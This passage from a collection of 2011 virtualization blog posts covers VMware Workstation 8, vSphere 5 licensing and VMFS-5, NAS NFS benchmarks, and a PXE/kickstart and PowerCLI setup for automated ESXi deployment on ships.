For now, I’ll have to stick to WANem for the latency simulation, at least until VMware adds latency tweaking to VMware Workstation. --- # Installing Windows 8 Developer Preview in VMware Workstation 8 URL: https://vNinja.net/virtualization/installing-windows-8-developer-preview-in-vmware-workstation-8/ Date: 2011-09-14 Author: christian Tags: fun, Microsoft, video, Virtualization, VMware, Windows 8, Workstation 8 Installing Microsoft Windows 8 in a VMware Workstation 8 VM turned out to be a real piece of cake. Follow the screenshots for the procedure I used, but basically all I did was create a new VM with the pre-configured “Windows 8 Server” preset and insert the downloaded ISO file. Note: Windows 8 Server has been removed as a preset option in the final release of VMware Workstation 8; my screenshots are from the beta version. If you want to install Windows 8 in the GA version of VMware Workstation 8, you’ll need to do a manual install (as opposed to Easy Install). Use the Windows 7 option as a baseline. Windows 8 VM Configuration Screenshots # [gallery link=“file”] Networking, sound and other virtual hardware issues were non-existent; everything just works right out of the box (or .iso, as the case may be). Adding more than 1GB of memory to the VM also helps a lot when it comes to its responsiveness. Windows 8 in VMware Workstation 8 Installation Video # Various Windows 8 Screenshots # [gallery link=“file” id=“1517”] --- # Backup Academy - Do You Know Your VM backups? URL: https://vNinja.net/virtualization/backup-academy-do-you-know-your-vm-backups/ Date: 2011-09-13 Author: christian Tags: Backup, Backup Academy, Certification, Hyper-V, Veeam, Virtualization, VMware The newly opened Backup Academy, by Veeam, aims to educate administrators, and others interested in virtual machine backup, in the skills required to maintain a proper backup strategy for your virtual infrastructure.
Currently the site has 8 videos available, covering content from disaster recovery to backup integrity tools. Even though it is run by Veeam, it does not focus on Veeam-specific products or services, but rather on the general ideas behind successful backup and disaster recovery of both VMware and Hyper-V based environments. It comes complete with training videos, and even a free certification exam you can take after finishing the very nice videos provided by the academy professors. Head over to the Backup Academy today, even if you are a seasoned virtual administrator. Who knows, you might even learn something! --- # VMware Workstation 8 - What's new? URL: https://vNinja.net/virtualization/vmware-workstation-8-whats-new/ Date: 2011-09-07 Author: christian Tags: Beta, Software, VMware, Workstation, Workstation 8 VMware is close (still in beta) to releasing the next major version of VMware Workstation. Update, September 14th 2011: VMware Workstation 8 has now officially been released. VMware Workstation 8 brings a lot of new features and enhancements to the table, and I’ve been lucky enough to play around with it in the beta program. VMware Workstation 8 System Requirements # To be able to install VMware Workstation, the host system processor needs to meet the following requirements:
- A 64-bit x86 CPU
- LAHF/SAHF support in long mode
To determine if your host system is 64-bit capable, download CPU-Z to check the capabilities of your processor. To be able to run nested 64-bit guests, like VMware vSphere 5 hosts, the system needs additional CPU features:
- An AMD CPU that has segment-limit support in long mode, or
- An Intel CPU that has VT-x support. VT-x support must be enabled in the host system BIOS.
For a list of Intel processors that support VT-x, check the Intel® Virtualization Technology List, or use CPU-Z to identify that as well. VMware Workstation 8 - New features #
New User Interface: The user interface has been updated with new menus, toolbars, and an improved preferences screen.
Remote Connections The Connect to Server feature allows remote connections to hosts running Workstation, ESX 4.x and Virtual Center. You can now use Workstation as a single interface to access all of the VMs you need, regardless of where they reside. Upload to vSphere Integrated vSphere drag and drop integration. Automatic usage of OVFTool enables easy uploading of VMs from VMware Workstation to ESX hosts or vCenter. Move workloads from your local test environment into the production environment with a few mouse clicks. Share your VMs This new feature allows you to control who accesses your VMs from other instances of Workstation; a great feature for teams working together, or for single administrators that access the same VMs from multiple computers. Also, a shared VM starts with the host OS without starting the VMware Workstation GUI, similar to how VMware Server worked before it was discontinued. New default keyboard driver To limit the number of reboots required during installation/upgrade of VMware Workstation, the Enhanced Keyboard functionality is no longer installed by default. Note: Upgrading from VMware Workstation 7 to 8 keeps and upgrades the existing driver, unless VMware Workstation 7 is uninstalled before installing version 8. Virtual VT-x/EPT or AMD-V/RVI This is a good one, at least for those of us that run lab environments on our desktops or laptops. This setting enables you to run 64-bit guests inside nested hypervisors like VMware vSphere 5. To enable it, edit the vCPU settings for the particular VM. Better Teams Add team attributes to any VM without any of the old drawbacks; you are no longer forced to create a Team in order to manage multiple VMs together. Improved graphics performance in guests Improved vSMP Other Virtual Hardware Improvements Memory support is now 64GB per VM HD Audio is available for Windows Vista, Windows 7, Windows 2008, and Windows 2008 R2 guests (RealTek ALC888 7.1 Channel High Definition Audio Codec) USB 3.0 support for Linux guests.
(Not available for Windows guests) Bluetooth devices can be shared with Windows guests --- # VMworld Hands-on Labs going public in 2012 URL: https://vNinja.net/virtualization/vmworld-hands-on-labs-going-public-in-2012/ Date: 2011-08-30 Author: christian Tags: labs, VMware, vmworld VMware Labs now has fixed data centers, which means that the VMworld Hands-On Labs are going to be publicly available in early 2012! Hear Mornay Van Der Walt, Senior Director R&D at VMware, explain the details in this video from VMworld TV: This is great news, and I’m sure I’m not the only one who thinks this is a really good idea. --- # SCCM 2007 Not a Virtualization Candidate? URL: https://vNinja.net/microsoft-2/sccm-2007-not-a-virtualization-candidate/ Date: 2011-08-26 Author: christian Tags: Microsoft, Ops, realworld, SCCM, Windows The last couple of days I’ve been in a training class, taking the 6451B Planning, Deploying and Managing Microsoft System Center Configuration Manager 2007 course. One of the first things that got mentioned was that for larger deployments you should not run System Center Configuration Manager virtually. Of course, this caught my eye, as I’m a proponent of the virtualize-first “movement”. It turns out that the reason for this is that Configuration Manager is somewhat poorly designed, as just about everything it receives from the clients in the network is placed in text-based log files (the inbox folder) before being processed and pumped into the back-end SQL DB. SCCM lives for, and eats, log files for a living. I’m sure there were good reasons for this, especially back in the day when SCCM 2007 was developed, but in retrospect it seems like a poor design choice. Especially since the IO intensity of writing text-based log files is high, and doesn’t scale well when you have loads of clients, which is exactly what SCCM 2007 is supposedly designed for in the first place.
There are ways of alleviating the strain on the machine running SCCM, like running the SQL server on a different server and running the management console on your local computer (remember, a Windows server is tuned, by default, to prioritize background tasks), but the fact remains that the sum of all the small write operations SCCM constantly performs puts a heavy strain on your storage. So, if you want to run SCCM 2007 virtualized in your environment, make sure your storage is up to the task and that you don’t saturate it by deploying what is, in essence, management software. Perhaps it is better to run it on a physical server with adequate local storage, but don’t blame that on virtualization; blame it on poor design in SCCM 2007. Hopefully Configuration Manager 2012, which is currently in beta 2, behaves better when it’s released. If not, how will Microsoft defend the lack of real performance when running it on Hyper-V (or any other hypervisor)? --- # Poor Man's WSUS URL: https://vNinja.net/microsoft-2/poor-mans-wsus/ Date: 2011-08-25 Author: christian Tags: Microsoft, Ops, Patching, Tool, WSUS Not that WSUS is expensive; after all, it’s a “free” add-on to the server you’re already running if you need it. Of course, running your own Windows Server Update Services (WSUS) infrastructure is preferable in just about every scenario, except for some edge cases where bandwidth or latency issues might prevent you from syncing the updates from a central repository. Sadly, these edge cases enter the fray from time to time, and I recently found myself in the middle of such a scenario. Without a WSUS infrastructure to sync from, and with very poor network connectivity, how would you go about getting hold of all the Microsoft patches for a given OS and Office suite? Manually download all the patches, and then manually (or scripted) apply them to the clients? Thankfully, this is where WSUS Offline Update comes to the rescue!
This clever little application, which requires no installation whatsoever, helps you patch Microsoft Windows and Microsoft Office without an active network connection. In essence, WSUS Offline Update lets you specify which operating systems and which versions of Office (and languages) you want to have patches available for in its repository. Run ..\wsusoffline\UpdateGenerator.exe to select versions and download them. It then proceeds to connect to Microsoft and download all applicable patches, and service packs if you want it to, figuring out the dependencies and supersedence along the way. Of course, this takes a while, but once it’s done you have a lovely little local repository of all the current Microsoft patches. Since WSUS Offline Update doesn’t require an installation, just unzip and run, it’s also very easy to move the repository to an external drive, a USB stick, or even transport it via the network. In addition, it provides built-in methods for creating ISO files or placing the files directly on USB media. When the patches have been downloaded, all you have to do is get the files transferred to the target client and run the ..\wsusoffline\client\UpdateInstaller.exe file, and the patches will be applied to the system you ran it on. It also keeps track of its local repository, to make sure that the next time it’s run it only downloads patches that have been released by Microsoft since the last run. All in all, this is a great tool to keep in your tool belt; it sure helped me this time! --- # vSphere 5: ESXi Installation Video URL: https://vNinja.net/virtualization/vsphere-5-esxi-installation-video/ Date: 2011-08-25 Author: christian Tags: ESXi, fun, video, Virtualization, VMware, vSphere, vSphere 5 To celebrate the vSphere 5 GA release today, I’ve recorded a quick video of the old school CD/ISO based installation: vSphere 5 ESXi Install Video from Christian Mohn on Vimeo. Seems strangely familiar, right? Enjoy!
--- # VMFS-5: Block Size Me URL: https://vNinja.net/virtualization/vmfs-5-block-size-me/ Date: 2011-08-05 Author: christian Tags: Block Size, Datastore, storage, VMFS, VMware, vSphere 5 The upcoming release of VMware vSphere 5 comes with an upgraded version of the VMware vStorage VMFS volume file system. One of the problems with VMFS-3 and earlier is that the block size you define when you format the datastore determines the maximum size of the VMDK files stored on it. This means that when planning your datastore infrastructure, you must have an idea of how large your VMDK files will potentially be during the lifecycle of the datastore. For VMFS-3 the block sizes, and their impact on VMDK files, look as follows:

| Block size | Maximum VMDK file size |
|------------|------------------------|
| 1MB        | 256GB                  |
| 2MB        | 512GB                  |
| 4MB        | 1TB                    |
| 8MB        | 2TB                    |

In other words, if you format your datastore with a 1MB block size, with VMFS-3, you are limited to a maximum VMDK file size of 256GB. Of course, you can work around this by adding more VMDK files to your VM, and then extending the disks inside the installed OS in the VM, but over time that might get a bit messy. The only way to change the block size is to migrate all the VMs stored on that particular datastore to a different one, and reformat your original datastore with a new block size. For environments with limited storage space, this can be a real headache. Thankfully, VMware has made this a thing of the past in VMware vSphere 5 and VMFS-5. VMFS-5 has a new unified block size of 1MB, which no longer limits you to 256GB VMDK files. In fact, the block size no longer really matters, as the per-block-size limits are removed completely. The table for vSphere 5 and VMFS-5 looks a bit simpler:

| Block size | Maximum VMDK file size |
|------------|------------------------|
| 1MB        | 2TB                    |

Upgrading from VMFS-3 to VMFS-5 is an online, non-disruptive operation, meaning you can do it while your VMs are running on the datastore. You can also extend VMDK files to the new limits on an upgraded VMFS-3 datastore, once it has been upgraded to VMFS-5.
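The VMFS-3 limits follow a simple pattern: every block size allows the same number of file blocks per file, so the maximum VMDK size scales linearly with block size. A quick illustration of that relationship (the constant and helper name are mine, and the real limits are actually 512 bytes less than these round figures):

```python
# On VMFS-3 the max file size is roughly (block size) x 256Ki blocks,
# which reproduces the 1MB -> 256GB, 8MB -> 2TB mapping from the table.
BLOCKS_PER_FILE = 256 * 1024  # illustrative constant derived from the limits

def max_vmdk_bytes(block_size_mb: int) -> int:
    """Approximate maximum VMDK size for a given VMFS-3 block size (in MB)."""
    return block_size_mb * 1024 * 1024 * BLOCKS_PER_FILE

for bs in (1, 2, 4, 8):
    print(f"{bs}MB block size -> {max_vmdk_bytes(bs) // 2**30}GB max VMDK")
```

With VMFS-5's unified 1MB block size, this calculation simply stops mattering when you format a datastore.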
Note: Remember to update all your hosts to vSphere 5 before upgrading your datastores, since vSphere 4 (and earlier) can’t read the new VMFS-5 filesystem. This is great news for vAdmins, since we no longer have to worry about the block size as a limiting factor for our VMs. _Simplification is always welcome!_ Of course, there are other improvements in VMFS-5 as well, but we’ll save those for a later post or two. --- # Dear John URL: https://vNinja.net/virtualization/dear-john/ Date: 2011-07-24 Author: christian Tags: John Troyer, V12n, VMware No, this is not a farewell post, but rather the opposite. It’s Dr. John Troyer’s birthday! John lives and breathes his role as Senior Social Media Strategist at VMware, and I have to say that one of the most brilliant moves VMware has made is to employ John in his current role. Lots of other corporations employ marketing people in their social media roles; VMware went the other way and put the very technically savvy Dr. John in the driving seat. To be honest, I don’t think he even has a rear-view mirror, as he’s constantly evolving and moving forward. Well played VMware, and extremely well executed John. The vExpert program, which I’m lucky enough to be a part of for 2011, is his brainchild, and if an honorary vExpert award should ever go to someone who goes above and beyond their job role, it should be awarded to John himself. In fact, John’s presence in the social media space has helped immensely in creating the community that revolves around VMware products and virtualization as a whole. John has been, and continues to be, instrumental in keeping everyone in the loop and helping out wherever he possibly can. On a more personal level, I’ve been lucky enough to meet the mammoth wookie on more than one occasion, first at VMworld 2010 in Copenhagen and then again (a couple of times) during Tech Field Day #6 in Boston in 2011. As the good sport John is, he even contributed to a special vSoup episode!
John even contacted me way back in 2006, when the virtualization blogosphere was in its infancy, asking if I wanted to have my old site featured on V12n! Being an ignorant European, I’m possibly stepping on a lot of toes here, but as soon as I see Dr. John Troyer written somewhere, I immediately think of Dr. J. Dr. J was a four-time MVP and was inducted into the NBA Hall of Fame in 1993. If there ever was a VMware Hall of Fame board somewhere in Palo Alto, Dr. John should have his employee number retired and his beard put on display. John, this one is for you. You’ve been an inspiration, a mentor and an all-around great guy for years and years on end. A while ago, you asked on Twitter if ThinApp was VMware’s best kept secret. The real answer to that is a big fat NO. John, you’re the secret, and for purely selfish reasons I hope the VMware management never finds out and kicks you further up the VMware food chain. We small fish need large wookies to keep tabs on us, and to help us feel all cozy and warm. Happy birthday John! --- # SMB Shared Storage Smackdown - Part 1 NFS Performance URL: https://vNinja.net/virtualization/smb-shared-storage-smackdown-part-1-nfs-performance/ Date: 2011-07-17 Author: Tags: Recently at the office I was given the task of testing out some SMB NAS products as potential candidates for some of our small branch offices all over the world. I ran many tests, ranging from backup and replication to actually running VMs on the devices and pounding them with IOmeter. What I will share with you in this series of posts is my vSphere/IOmeter tests for NFS and iSCSI. With these tests my main goal was to see what kinds of IO loads the NAS devices could handle, and also how suitable they would be for running a small vSphere environment. In my next post I will go into iSCSI performance and will publish all of my results, including NFS, in a downloadable PDF.
NAS Devices #

- Synology DS411+
- NetGear ReadyNAS NV+
- QNAP TS4139 Pro II+
- Iomega StorCenter ix4-200d

I chose the 4-drive model of each array, and they are all filled with 1TB SATA disks. It was chosen this way since we would also be using these devices to hold rather large backups and replicate them elsewhere. To start out, I upgraded all of them to the latest firmware and created RAID 5 arrays on each of them. To make a long story short, this gave me anywhere from 2.5TB to 2.8TB of usable storage on each device. Since I tested both NFS and iSCSI, I first created a 1TB iSCSI LUN (1MB block size on the datastore) on each device, then created an NFS export for the remainder of the space. Another small note: I made sure that write caching was enabled on all arrays that had the option to turn it on or off. Then I got down to setting up vSphere and the rest of my hardware. Server/VM/Network Infrastructure #

- 1 HP DL380 G5 - 2 quad-core pCPUs - 16 logical cores with HT enabled
- 16GB of pRAM - ESXi 4.1 U1 installed, default configuration
- Win2k8 VMs on each NAS device - 24GB boot device VMDK, 100GB VMDK with the standard LSI Logic SAS controller, 1 vCPU and 4096MB vRAM
- Dell PowerConnect 5524 switch - split up into a VLAN for VM/vSphere management traffic and a VLAN for iSCSI/NFS traffic

I began the task of plugging everything in, getting everything set up properly so as not to skew any results, and spinning up VMs in the datastores from the attached iSCSI LUNs/NFS exports. It is important to note that for each shared storage datastore I created a new VM with the exact specifications above, via template, and aligned all disks to 64K. For the connection to the storage I only had one extra 1GbE NIC per server, so in ESXi I created a separate standard vSwitch just for iSCSI/NFS traffic. If you are interested in the setup of my lab infrastructure, please contact me and I will be happy to go more in depth.
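As an aside, the 2.5-2.8TB usable range quoted above is just RAID-5 arithmetic combined with the gap between a vendor "terabyte" and what the OS reports. A quick sketch with generic numbers (not vendor-reported figures):

```python
def raid5_usable_bytes(disks: int, disk_bytes: int) -> int:
    """RAID-5 reserves one disk's worth of capacity for parity."""
    return (disks - 1) * disk_bytes

# Four "1 TB" drives: vendors count decimal bytes (10**12),
# while the OS reports binary terabytes (2**40).
usable = raid5_usable_bytes(4, 10**12)
print(usable / 2**40)  # roughly 2.7 binary TB, before filesystem overhead
```

Where each device lands inside that range then comes down to its filesystem and metadata overhead.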
Testing Method and Results Collection # After playing around with IOmeter for some time, and searching around to find a standard, I decided to use the tests from the very popular VMware Communities Open unofficial storage performance thread. The exact ICF file I used can also be found there for download, if you would like to do some of your own tests. Regardless of the age of some of the posts, I still think this is the most relevant and fair measure possible. These tests include:

- Max Throughput - 100% Read
- RealLife - 60% random, 65% Read
- Max Throughput - 50% Read
- Random-8k - 70% Read

The first important thing to mention is that only the VM generating the load was powered on during each test, so there should be no skewing from other workloads. I put the IOmeter results into a set of Excel bar graphs, and decided to base my results on what I call the big 3: total IOPS, MBps, and average latency. NFS Final Performance Result # NFS Max Throughput 100% Read # RealLife-60% random - 65% Read # Max Throughput-50% Read # Random-8k 70% Read # Final Conclusions For NFS and closing # As you may have noticed from the assorted graphs, the two winners to come out of the NFS performance tests were QNAP and Synology. QNAP appears to be slightly better at more random workloads, such as a real-life vSphere environment, and Synology seems to be way ahead of most of the arrays with solid sequential storage access, which would be perfect for a backup device. However, they all seem to have high average response times during random workloads, which in my opinion makes or breaks how well an environment runs. From this first look I would say most of these NAS devices would be just fine for shared storage in a very small lab environment, a possible backup target, or for something as simple as a file server volume. In my next post we can put it all together with the iSCSI results and declare the final winner of the SMB Shared Storage Smackdown! --- # vSphere 5 and new licensing - Good or bad?
URL: https://vNinja.net/news/vsphere-5-and-new-licensing-good-or-bad/ Date: 2011-07-12 Author: Tags: ESXi, Licensing, VMware, vRam, vSphere, vSphere 5 Like many of you, I watched today's Cloud Infrastructure Forum and the release of vSphere 5. I was very excited about many of the features, such as Storage Profiling, Storage DRS and the VMFS-5 release, and they have blown the top off the resource limits on VMs to create Monster VMs - just to mention a few. However, one topic I noticed causing quite a stir is the new licensing, which seemed to be only briefly mentioned at the end of the webinar. To quote VMware on page 3 of the vSphere 5 licensing guide: vSphere 5.0 will be licensed on a per-processor basis with a vRAM entitlement. Each vSphere 5.0 CPU license will entitle the purchaser to a specific amount of vRAM, or memory configured to virtual machines. The vRAM entitlement can be pooled across a vSphere environment to enable a true cloud or utility based IT consumption model. Just like VMware technology offers customers an evolutionary path from the traditional datacenter to cloud infrastructure, the vSphere 5.0 licensing model allows customers to evolve to a cloud-like “pay for consumption” model without disrupting established purchasing, deployment and license-management practices and processes. This caused quite an uproar on Twitter, with people complaining that it would raise their licensing costs. My personal opinion on the new licensing is both negative and positive. For every negative side I see in something, I always try to put a positive spin on it. Firstly, it is true that this may cause some highly consolidated shops to have to reassess their infrastructure before they upgrade to vSphere 5. It may require the purchase of more licenses to obtain more pooled vRAM, to be on the legal side of the licensing. It may also slow adoption, as people have to perform audits on their infrastructure to determine what will be needed for the new licensing model.
Also, for some of the big, memory-packed beast servers, this may prove to be a disadvantage. As far as I can tell from the vSphere 5 licensing guide, there is no hard limit, and vSphere will not stop you from deploying VMs, in every licensing model except Essentials, where there actually is a hard limit. On a positive note: as a vSphere admin, this licensing may make my life easier. When application owners realize that there is a charge based on memory use, and that they may need to sign a purchase order to get their oversized machine approved instead of making their application more efficient, they may change their tune a bit. This means less VM sprawl, and more focus on what exactly is running in the environment and whether it is running at its absolute best and most efficient. Also, if there is a zombie VM consuming some valuable vRAM, I am sure it will be found and dispatched more quickly than with the current licensing model. --- # Online Event: Raising the Bar, Part V URL: https://vNinja.net/virtualization/online-event-raising-the-bar-part-v/ Date: 2011-07-07 Author: christian Tags: event, video, VMware July 12, 2011 9am-Noon Pacific Time: Join this online event, and get all the details on “the next generation of cloud infrastructure”! VMware CEO Paul Maritz and CTO Steve Herrod will be presenting on the next generation of cloud infrastructure. Join us and experience how the virtualization journey is helping transform IT and ushering in the era of Cloud Computing.

- 9:00-9:45 Paul and Steve present - live online streaming
- 10:00-12:00 three tracks of deep dive breakout sessions
- 10:00-12:00 live Q&A with VMware cloud and virtualization experts

Register for the event now! Add the event to your calendar! The live Q&A session looks very interesting, with fellow vExperts Eric Siebert (vSphere-land), David Davis (VMware Videos), Bob Plankers (The Lone Sysadmin) and Bill Hill (Virtual Bill) joining! Not to be missed!
Update # If you register now, and attend the event on Tuesday, you might win a FREE pass to VMworld 2011 in Las Vegas or in Copenhagen! That’s a potential saving of $2195! For more details, see Who’s got the golden ticket? Win a free VMworld pass at our July 12 online event. --- # Setting Up Automated ESXi Deployments URL: https://vNinja.net/virtualization/setting-up-automated-esxi-deployments/ Date: 2011-07-07 Author: christian Tags: automation, ESXi, fun, Ops, PowerCLI, Powershell, realworld, Virtualization, VMware Automating ESXi installs became much easier with the release of vSphere 4.1, where the Scripted Install feature was added, and with VMware Auto Deploy from VMware Labs. VMware Auto Deploy requires that you have vCenter and Host Profiles in your environment, and that in turn requires Enterprise Plus licenses. It is, however, possible to deploy ESXi in an automated fashion completely without vCenter and Host Profiles, by using a combination of a PXE-based installation and PowerCLI to automate the setup of ESXi after the initial deployment. As this setup has been put together for a specific work project, my PowerCLI script also copies a VM template to the deployed ESXi host, as well as the vMA for administrative tasks. There is one caveat with regard to this setup though, and that is that the free version of ESXi only allows PowerCLI in read-only mode. This means that you will either need to get licenses for the ESXi install, or use trial licenses. With the price drop from VMware on the Remote Office / Branch Office (ROBO) licenses, we’re looking at using that licensing model for our fleet of vessels.
Overview # The “complete package” consists of the following components:

- Deployment VM - a custom VM, built to provide the DHCP and PXE services that perform the actual ESXi installation
- PowerShell + PowerCLI - scripts that configure the ESXi host post-installation, and copy your initial VMs to the new host

Our current process looks like this:

1. Connect the physical host to the deployment laptop via Ethernet
2. Start the deployment VM on the deployment laptop
3. When the deployment VM has finished booting, start the physical host
4. The physical host boots off the network via PXE and installs ESXi
5. When the ESXi installation finishes, run the PowerCLI script against the host
6. Disconnect the deployment laptop from the physical host, and connect the physical host to the vessel network
7. Connect the vSphere Client to the ESXi install and start the server VM

Deployment VM # Since our deployment scenario might be a bit out of the ordinary, we have the deployment VM set up in VMware Workstation or VMware Player on a laptop. The reason for this is that we need a mobile deployment model, as the locations we are deploying to are not static. Not only are they mobile, they are actually floating around on rather large oceans. That’s right, we’re deploying ESXi hosts on our vessels world wide! Basic VM Setup # The basic setup is a standard Windows Server 2008 R2 with IIS installed. We will not be using the DHCP or other networking features included in Server 2008. In our environment it’s configured with a static IP of 172.16.200.1. DHCP + PXE Setup # For DHCP and PXE services, we are using Tftpd32, a free and open source application that provides us with all the required services for deployment, i.e. both DHCP and PXE.
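For reference, the PXE side of a setup like this boils down to a pxelinux menu entry that boots the ESXi installer with a `ks=` pointer to the kickstart file on the deployment server. A rough sketch of what that entry can look like for ESXi 4.1 (the module names come from the ESXi installation media, and the exact list may differ for your build, so treat this as an assumption to verify against your media):

```
default esxi-install
label esxi-install
  kernel mboot.c32
  append vmkboot.gz ks=http://172.16.200.1/ks.cfg --- vmkernel.gz --- sys.vgz --- cim.vgz --- ienviron.vgz --- install.vgz
```

Tftpd32 then only needs to hand out addresses and serve `mboot.c32` plus these modules over TFTP.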
Kickstart Script # Our very basic kickstart script - ks.cfg - looks like this:

```
vmaccepteula
rootpw password
autopart --firstdisk --overwritevmfs
install url http://172.16.200.1/ESXi
network --bootproto=dhcp --device=vmnic0
reboot
```

Basically this accepts the EULA, sets the root password, automatically deletes all partitions and sets up a new VMFS volume, tells the installer that it will find the installation files via HTTP on the deployment server, and sets the networking configuration to DHCP. This will of course need tweaking in your environment, but it should at least get you started with building your own. More details on the ks.cfg bootstrap commands can be found in the ESX and vCenter Server Installation Guide.

PowerCLI Configuration Script #

```powershell
########################################################
#
# Created by Christian Mohn
# for Seatrans AS
#
# No warranty suggested or implied
#
########################################################

function Register-VMX {
    param($entityName = $null, $dsNames = $null, $template = $false,
          $ignore = $null, $checkNFS = $false, $whatif = $false)

    function Get-Usage {
        Write-Host "Parameters incorrect" -ForegroundColor red
        Write-Host "Register-VMX -entityName -dsNames [,...]"
        Write-Host "entityName : a cluster-, datacenter or ESX hostname (not together with -dsNames)"
        Write-Host "dsNames    : one or more datastore names (not together with -entityName)"
        Write-Host "ignore     : names of folders that shouldn't be checked"
        Write-Host "template   : register guests (`$false) or templates (`$true) - default : `$false"
        Write-Host "checkNFS   : include NFS datastores - default : `$false"
        Write-Host "whatif     : when `$true will only list and not execute - default : `$false"
    }

    if (($entityName -ne $null -and $dsNames -ne $null) -or
        ($entityName -eq $null -and $dsNames -eq $null)) {
        Get-Usage
        break
    }

    if ($dsNames -eq $null) {
        switch ((Get-Inventory -Name $entityName).GetType().Name.Replace("Wrapper", "")) {
            "Cluster" {
                $dsNames = Get-Cluster -Name $entityName | Get-VMHost | Get-Datastore |
                           where { $_.Type -eq "VMFS" -or $checkNFS } | % { $_.Name }
            }
            "Datacenter" {
                $dsNames = Get-Datacenter -Name $entityName | Get-Datastore |
                           where { $_.Type -eq "VMFS" -or $checkNFS } | % { $_.Name }
            }
            "VMHost" {
                $dsNames = Get-VMHost -Name $entityName | Get-Datastore |
                           where { $_.Type -eq "VMFS" -or $checkNFS } | % { $_.Name }
            }
            Default {
                Get-Usage
                exit
            }
        }
    }
    else {
        $dsNames = Get-Datastore -Name $dsNames | where { $_.Type -eq "VMFS" -or $checkNFS } |
                   Select -Unique | % { $_.Name }
    }
    $dsNames = $dsNames | Sort-Object

    $pattern = "*.vmx"
    if ($template) { $pattern = "*.vmtx" }

    foreach ($dsName in $dsNames) {
        Write-Host "Checking " -NoNewline
        Write-Host -ForegroundColor red -BackgroundColor yellow $dsName
        $ds = Get-Datastore $dsName | Select -Unique | Get-View
        $dsBrowser = Get-View $ds.Browser
        $dc = Get-View $ds.Parent
        while ($dc.MoRef.Type -ne "Datacenter") {
            $dc = Get-View $dc.Parent
        }
        $tgtfolder = Get-View $dc.VmFolder
        $esx = Get-View $ds.Host[0].Key
        $pool = Get-View (Get-View $esx.Parent).ResourcePool

        # Collect the paths of all VMs already registered on this datastore
        $vms = @()
        foreach ($vmImpl in $ds.Vm) {
            $vm = Get-View $vmImpl
            $vms += $vm.Config.Files.VmPathName
        }

        $datastorepath = "[" + $ds.Name + "]"
        $searchspec = New-Object VMware.Vim.HostDatastoreBrowserSearchSpec
        $searchspec.MatchPattern = $pattern
        $taskMoRef = $dsBrowser.SearchDatastoreSubFolders_Task($datastorePath, $searchSpec)
        $task = Get-View $taskMoRef
        while ("running", "queued" -contains $task.Info.State) {
            $task.UpdateViewData("Info.State")
        }
        $task.UpdateViewData("Info.Result")

        foreach ($folder in $task.Info.Result) {
            if (!($ignore -and (& { $res = $false
                                    $folder.FolderPath.Split("]")[1].Trim(" /").Split("/") |
                                        % { $res = $res -or ($ignore -contains $_) }
                                    $res }))) {
                $found = $FALSE
                if ($folder.file -ne $null) {
                    foreach ($vmx in $vms) {
                        if (($folder.FolderPath + $folder.File[0].Path) -eq $vmx) {
                            $found = $TRUE
                        }
                    }
                    if (-not $found) {
                        if ($folder.FolderPath[-1] -ne "/") { $folder.FolderPath += "/" }
                        $vmx = $folder.FolderPath + $folder.File[0].Path
                        if ($template) {
                            $params = @($vmx, $null, $true, $null, $esx.MoRef)
                        }
                        else {
                            $params = @($vmx, $null, $false, $pool.MoRef, $null)
                        }
                        if (!$whatif) {
                            $taskMoRef = $tgtfolder.GetType().GetMethod("RegisterVM_Task").Invoke($tgtfolder, $params)
                            Write-Host "`t" $vmx "registered"
                        }
                        else {
                            Write-Host "`t" $vmx "registered" -NoNewline
                            Write-Host -ForegroundColor blue -BackgroundColor white " ==> What If"
                        }
                    }
                }
            }
        }
        Write-Host "Done"
    }
}

# Usage examples:
# Register-VMX -entityName "MyDatacenter"
# Register-VMX -dsNames "datastore1","datastore2"
# Register-VMX -dsNames "datastore1","datastore2" -template:$true
# Register-VMX -entityName "MyDatacenter" -ignore "SomeFolder"
# Register-VMX -dsNames "datastore3","datastore4" -ignore "SomeFolder" -checkNFS:$true
# Register-VMX -entityName "MyDatacenter" -whatif:$true

# Connect to the selected vCenter or ESX host
if ($args[0] -eq $null) {
    $hostName = Read-Host "Enter ESX Host Name or IP"
}
else {
    $hostName = $args[0]
}
Connect-VIServer $hostName

# Set datastore name and map it as a PSDrive
$dsName = "datastore1"
$ds = Get-Datastore -Name $dsName
New-PSDrive -Name $dsName -Root \ -PSProvider VimDatastore -Datastore $ds

# Copy and register VM from the local drive to the ESXi host
Copy-DatastoreItem C:\VMs\MyTestVM\* datastore1:\MyTestVM\ -Force
Register-VMX -dsNames $dsName

# Import the vMA ovf
Import-VApp -Source c:\VMs\vMA\vMA-4.1.0.0-268837.ovf -VMHost $hostName -Datastore $ds

# Let's configure the host
########################################################
# Host Configuration                                   #
########################################################

# Disable IPv6
Get-VMHostNetworkAdapter | where { $_.PortGroupName -eq "Service Console 1" } |
    Set-VMHostNetworkAdapter -IPv6Enabled $false

# Configure networking
# Not finished

# Configure NTP servers
Add-VMHostNtpServer -VMHost $hostName -NtpServer "0.vmware.pool.ntp.org"
Add-VMHostNtpServer -VMHost $hostName -NtpServer "1.vmware.pool.ntp.org"
Add-VMHostNtpServer -VMHost $hostName -NtpServer "2.vmware.pool.ntp.org"

# Set VM start policy
$vmstartpolicy = Get-VMStartPolicy -VM MyTestVM
Set-VMStartPolicy -StartPolicy $vmstartpolicy -StartAction PowerOn
```

This PowerCLI script is not 100% finished yet; the networking part remains to be automated to provide the correct configuration based on which vessel we are deploying to, but in general it’s pretty much good to go. Of course, there are loads of ways to extend and improve this process, but for now it suits our needs very well. I’m sure I’ll need to revise it once vSphere.next is out and ready for deployment. Using a model like this, combined with some interesting usage patterns for vMA, you can create an automated ESXi deployment scenario that lets you deploy, patch and manage your remote vSphere infrastructure in a pretty streamlined fashion. --- # Exchange 2010 SP1 and KB2393802 or How to Have an Interesting Afternoon at the Office URL: https://vNinja.net/microsoft-2/exchange-2010-sp1-and-kb2393802-or-how-to-have-an-interesting-afternoon-at-the-office/ Date: 2011-07-06 Author: Tags: Event ID 2915, Exchange, KB2393802, Messaging, Microsoft, Ops, realworld, Windows Let me start this post out with a little story. I am normally a hardcore virtualization and storage guy. Sometimes my career in this sector brings me into contact with stuff I haven’t worked with before, because virtualization encompasses so much. As I continue to work with other teams, I learn more and more about what they do every day. I usually find myself involved in every performance troubleshooting session and every new project these days. My personal philosophy is that the IT guy of the future will be truly converged, just as all the technologies are converging into one box or “stack”. Specialties in smaller subsets will fall away, and specialization in everything datacenter may become the norm. Early Monday morning I overheard a conversation about connection issues with our new Exchange 2010 environment while drinking some coffee and reviewing my brand new vSphere design.
